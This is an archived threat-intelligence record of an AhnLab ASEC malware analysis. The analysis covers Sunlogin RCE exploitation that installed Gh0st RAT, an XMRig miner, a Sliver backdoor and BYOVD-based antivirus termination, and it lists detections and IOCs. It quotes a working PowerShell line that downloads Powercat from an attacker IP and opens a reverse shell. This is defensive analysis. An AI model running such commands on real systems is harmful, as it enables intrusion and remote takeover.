{
	"id": "ef3a9259-24b9-488c-a401-af4d92658b1b",
	"created_at": "2026-04-06T00:12:03.788251Z",
	"updated_at": "2026-04-10T03:24:24.676468Z",
	"deleted_at": null,
	"sha1_hash": "1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e",
	"title": "Sliver Malware With BYOVD Distributed Through Sunlogin Vulnerability Exploitations - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3751240,
	"plain_text": "Sliver Malware With BYOVD Distributed Through Sunlogin\r\nVulnerability Exploitations - ASEC\r\nBy ATCP\r\nPublished: 2023-02-06 · Archived: 2026-04-05 15:34:10 UTC\r\nSliver is an open-source penetration testing tool developed in the Go programming language. Cobalt Strike and\r\nMetasploit are major examples of penetration testing tools used by many threat actors, and various attack cases\r\ninvolving these tools have been covered here on the ASEC blog. Recently, there have been cases of threat actors\r\nusing Sliver in addition to Cobalt Strike and Metasploit.\r\nThe ASEC (AhnLab Security Emergency response Center) analysis team is monitoring attacks against systems\r\nwith either unpatched vulnerabilities or misconfigured settings. During this process, we have recently discovered a\r\nSliver backdoor being installed through what is presumed to be vulnerability exploitation on certain software. Not\r\nonly did threat actors use the Sliver backdoor, but they also used the BYOVD (Bring Your Own Vulnerable\r\nDriver) malware to incapacitate security products and install reverse shells.\r\nThe software that was targeted by this vulnerability exploitation was Sunlogin, a remote-control program\r\ndeveloped in China. Sunlogin, which had its remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) and the code that exploited said vulnerability made publicly available last year, is still being targeted\r\nby vulnerability attacks.\r\nFirst, a brief summary of the Sliver penetration testing tool will be given. Afterward, cases involving the\r\ncontinuous Sunlogin attacks will be covered through our ASD (AhnLab Smart Defense) logs. Finally, we will\r\nbreak down the recently confirmed attack cases where Sliver and BYOVD were ultimately installed.\r\n1. Sliver\r\nPenetration testing tools are used for the purpose of checking the security vulnerabilities within the network and\r\nsystems of companies and institutes. 
They can potentially be used for malicious purposes if placed in the hands of threat actors, as they generally provide various features for each penetration testing stage.\r\nThe most well-known commercial penetration testing tool is most likely Cobalt Strike. Following the release of a cracked version, it is still being used by various threat actors to this very day. There is also the open-source tool Metasploit, which is similarly easy to obtain and thus often used in attacks. There are many other penetration testing tools aside from Cobalt Strike and Metasploit, but a majority of recent cases were found to be using the open-source penetration testing tool Sliver. [1]\r\nhttps://asec.ahnlab.com/en/47088/\r\nPage 1 of 12\n\nFigure 1. Sliver description\r\nAmong the characteristics of Sliver, the fact that it was developed in Go, a cross-platform language, allows it to support Windows, Linux, and macOS. Its comparatively recent development can also be considered a defining characteristic: tools that have been used by threat actors for a long time, like Cobalt Strike and Metasploit, are more prone to being detected by security products than Sliver. Therefore, Sliver is being used by various threat actors in place of existing tools like Cobalt Strike. [2] [3] [4]\r\nCommands can be sent by the threat actor through the backdoor created by Sliver to perform a variety of malicious behaviors. Its features include most of the features supported by typical backdoors and RAT malware, such as process and file handling, command execution, uploading/downloading files, and screenshot capturing. It also provides other features necessary for taking over internal networks, such as privilege escalation, process memory dumping, and lateral movement.\r\nFigure 2. 
Command transmission process to the installed Sliver backdoor\r\nFigure 3. A portion of the commands supported by Sliver\r\nIn addition to file, behavior, and memory detection, anti-malware security products are also capable of detecting network behaviors, such as a malware strain trying to communicate with C\u0026C servers. Therefore, various penetration testing tools, including Cobalt Strike, provide multiple ways of communicating with the C\u0026C server in order to evade network detection. Sliver likewise supports mTLS, WireGuard, HTTP(S), and DNS for communication with the C\u0026C server, which allows it to evade the network detection of security products through encryption of the network communication.\r\nThe Sliver backdoor also supports two modes, Session Mode and Beacon Mode. A Sliver backdoor built in Session Mode communicates with the C\u0026C server in real time, while one built in Beacon Mode communicates with the C\u0026C server asynchronously: it obtains commands or task lists from the C\u0026C server and sends back the results after executing them.\r\n2. Vulnerability Exploitations and Attacks Targeting Sunlogin\r\nSunlogin is a remote-control utility developed by the Chinese tech company Oray. In 2022, the remote code execution vulnerability CNVD-2022-10270 / CNVD-2022-03672 was made publicly available along with the code that exploited it, [5] after which attacks that abused it were found. We assume that “SunloginCLient.exe” is the vulnerable process being targeted by attacks, [6] and multiple attacks have been confirmed since early 2022 according to our ASD logs.\r\n2.1. 
Gh0st RAT\r\nAlthough the packet used in the attack has not been found, it is assumed that the malware is installed through exploitation of the Sunlogin RCE vulnerability, via a PowerShell command run by the “SunloginCLient.exe” process. The “SunloginCLient.exe” process used in the actual attacks is an earlier version than v11.0.0.33, which is known to have been patched. The following is the process tree of the PowerShell command that downloads and installs Gh0st RAT. It confirms that the PowerShell command was run by the “SunloginCLient.exe” process.\r\nFigure 4. Gh0st RAT installation process tree\r\nThis assumption is also supported by examining the command used in the attacks. The PoC that was released first uses the following command when exploiting the vulnerability. [7]\r\nFigure 5. PoC’s vulnerability exploitation routine\r\nThe command used in the aforementioned Gh0st RAT attack is as follows and is similar to the command used in the PoC above.\r\nFigure 6. PowerShell command used in attacks\r\n2.2. XMRig CoinMiner\r\nThreat actors occasionally install XMRig CoinMiner instead of Gh0st RAT. According to our ASD log, the following command is executed via the “SunloginCLient.exe” process, which downloads and runs the batch malware “syse.bat”.\r\nFigure 7. Vulnerability exploitation command that installs XMRig CoinMiner\r\n“syse.bat” downloads either the “t.zip” or “t_64.zip” compressed file, along with 7z, according to the hardware environment. The files are then unzipped into either the “C:\\windows\\WinSysMaintenance\\.arc” or “C:\\WinSysMaintenance\\.arc” directory depending on the privilege level.\r\nFigure 8. 
Download routine for the compressed file containing malware\r\nXMRig CoinMiner is not contained as-is within the compressed file; instead, it is executed through launcher and loader malware. “watch.exe” is the launcher and “splwow32.exe” is the loader, which loads and decodes the encoded XMRig, “WINSysCoreR.bin”, before executing it in memory.\r\nFigure 9. Compressed file containing malware\r\nAfterward, “syse.bat” changes the XMRig wallet address and passes “WINSysCoreR.bin” as an argument to “splwow32.exe” before executing it. This starts the Monero coin mining process on the infected system.\r\nFigure 10. XMRig execution routine\r\n3. Cases of Recent Attacks\r\nThere have been a steady number of attacks targeting the Sunlogin RCE vulnerability. Most of these cases involved the installation of Gh0st RAT and XMRig CoinMiner. In this blog post, we cover the recently confirmed attacks where a Sliver backdoor and a Powercat reverse shell were installed.\r\nThe threat actor first installed a PowerShell script using the Sunlogin RCE vulnerability. This PowerShell script used the BYOVD technique to incapacitate the security products installed on the system before installing a reverse shell using Powercat. It is unconfirmed whether it was done by the same threat actor, but after a few hours, a log shows that a Sliver backdoor was installed on the same system through a Sunlogin RCE vulnerability exploitation.\r\n3.1. BYOVD \u0026 Powercat\r\nThe first command executed on the target system downloads and executes the following “2.ps1” PowerShell script.\r\nFigure 11. PowerShell command that installs the loader malware\r\nThe PowerShell script is obfuscated, but upon closer examination, it has a simple structure with the following two major features. 
The first feature decodes the compressed .NET PE before loading and executing it in memory. The encoded PE is developed in .NET, and its function kdjvasbulidcfaeusyefoaexwyroaw7fyoaeufhodusicvfy8cye() is executed through a PowerShell command.\r\nFigure 12. Decoded PowerShell command – Modified\r\n“ujacldfajlvjfaslflcevdfuaelfiua.exe” is assumed to be the open-source tool Mhyprot2DrvControl, modified by the threat actor to forcefully terminate security products. [8] Unlike the open-source tool, the malware contains the following AvList of process names of anti-malware products to be forcefully terminated.\r\nFigure 13. List of anti-malware products to be force terminated\r\nMhyprot2DrvControl uses the BYOVD (Bring Your Own Vulnerable Driver) technique, which abuses vulnerable Windows driver files and uses the resulting escalated privileges to perform arbitrary behaviors. Recently, many threat actors have been using this technique to escalate their privileges and forcefully terminate security products to evade detection. [9]\r\nMhyprot2DrvControl specifically abuses the mhyprot2.sys file. This file is an anti-cheat driver developed by the Chinese game company miHoYo, the creators of Genshin Impact. mhyprot2.sys is a legitimate driver file with a valid signature, but its verification of the process that calls it is weak. Through a simple bypass, the malware can access the kernel through mhyprot2.sys. The developer of Mhyprot2DrvControl provided multiple features that can be used with the privileges escalated through mhyprot2.sys. Among these, the threat actor used the feature that allows the forced termination of processes to develop a malware that shuts down multiple anti-malware products.\r\nFigure 14. 
Routine for checking the process list to terminate AV products\r\nThe second feature of the PowerShell script is downloading Powercat from an external source and using it to run a reverse shell on the infected system. When executed, the reverse shell connects to the C\u0026C server and gives the threat actor control over the infected system by exposing cmd.exe, in other words, a shell.\r\nIEX (New-Object Net.Webclient).DownloadString(\"hxxp://45.144.3[.]216/powercat.ps1\");\r\npowercat -c 45.144.3[.]216 -p 14356 -e cmd\r\n3.2. Sliver Backdoor Attack\r\nBesides the PowerShell script above, the threat actor used the vulnerability to execute a PowerShell command that installed the “acl.exe” malware. The following is our ASD log of the PowerShell command executed through the Sunlogin RCE vulnerability.\r\nFigure 15. Sliver backdoor installed through the Sunlogin vulnerability\r\nFigure 16. PowerShell command that installs the Sliver backdoor\r\nThe downloaded “acl.exe” is the Sliver backdoor. Sliver is normally obfuscated when the backdoor is built, so only obfuscated Go functions can be seen even after decompiling. This means that the threat actor used the binaries generated by the Sliver framework as-is in the attacks, without additional packing.\r\nFigure 17. Obfuscated Sliver backdoor\r\nAlthough the function names are obfuscated, the underlying routines remain the same, so static analysis shows that the Sliver used in the attack was built in Session Mode and used the mTLS protocol for communication with the C\u0026C server. Additionally, through debugging, the team recovered the decoded configuration data, which contains the Sliver backdoor’s name and C\u0026C server address, as shown in Figure 18.\r\nFigure 18. Decoded configuration data\r\nSliver backdoor name: LITERARY_WHOLE\r\nC\u0026C server address: mtls://43.128.62[.]42:8888\r\n4. 
Conclusion\r\nRecently, the team has confirmed cases of attack where various strains of malware, including the Sliver backdoor, were installed on vulnerable and unpatched software. Sliver is being used in various forms of attack by recent attack groups that steal information from company systems and install ransomware on them. This is because, as a penetration testing tool, Sliver offers the required step-by-step features, such as account information theft, internal network movement, and taking over the internal network of companies, just like Cobalt Strike.\r\nUsers should apply the latest patch to their installed software to prevent vulnerability exploitations in advance. Also, V3 should be updated to the latest version so that malware infection can be prevented.\r\nFile Detection\r\n– CoinMiner/BAT.Generic.SC185824 (2023.01.24.03)\r\n– Trojan/Win.Launcher.C5364876 (2023.01.24.00)\r\n– Trojan/Win.Loader.C5364877 (2023.01.24.00)\r\n– CoinMiner/BIN.Encoded (2023.01.24.03)\r\n– CoinMiner/Text.Config (2023.01.24.03)\r\n– Trojan/Win32.RL_Agent.R362708 (2021.01.12.05)\r\n– Trojan/PowerShell.Obfuscated (2023.01.24.03)\r\n– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)\r\n– Trojan/PowerShell.Powercat.S1567 (2021.07.07.02)\r\n– Trojan/Win.Sliver.C5363965 (2023.01.22.02)\r\nBehavior Detection\r\n– Execution/MDP.Powershell.M2514\r\n– Malware/MDP.DriveByDownload.M1659\r\nAMSI Detection\r\n– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)\r\n– Trojan/PowerShell.Powercat.SA1567 (2021.07.07.02)\r\nIOC\r\nDownload\r\n– hxxp://5.199.173[.]103/syse.bat : XMRig Downloader Batch\r\n– hxxp://5.199.173[.]103/t.zip : XMRig zip\r\n– hxxp://5.199.173[.]103/t_64.zip : XMRig zip\r\n– hxxp://5.199.173[.]103/7za.exe : 7z\r\n– hxxp://61.155.8[.]2:81/c6/include/images/help23.sct : Gh0st RAT\r\n– hxxp://45.144.3[.]216/2.ps1 : PowerShell Malware\r\n– hxxp://45.144.3[.]216/powercat.ps1 : Powercat\r\n– hxxp://43.128.62[.]42/acl.exe : Sliver Backdoor\r\nC\u0026C\r\n– idc6.yjzj[.]org:56573 : Gh0st RAT\r\n– 45.144.3[.]216:14356 : Powercat Reverse Shell\r\n– 43.128.62[.]42:8888 : Sliver Backdoor\r\nSource: https://asec.ahnlab.com/en/47088/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47088/"
	],
	"report_names": [
		"47088"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434323,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.pdf",
		"text": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.txt",
		"img": "https://archive.orkl.eu/1211b055c1af4dea4a3e32d773d7c2f1ad1a0a3e.jpg"
	}
}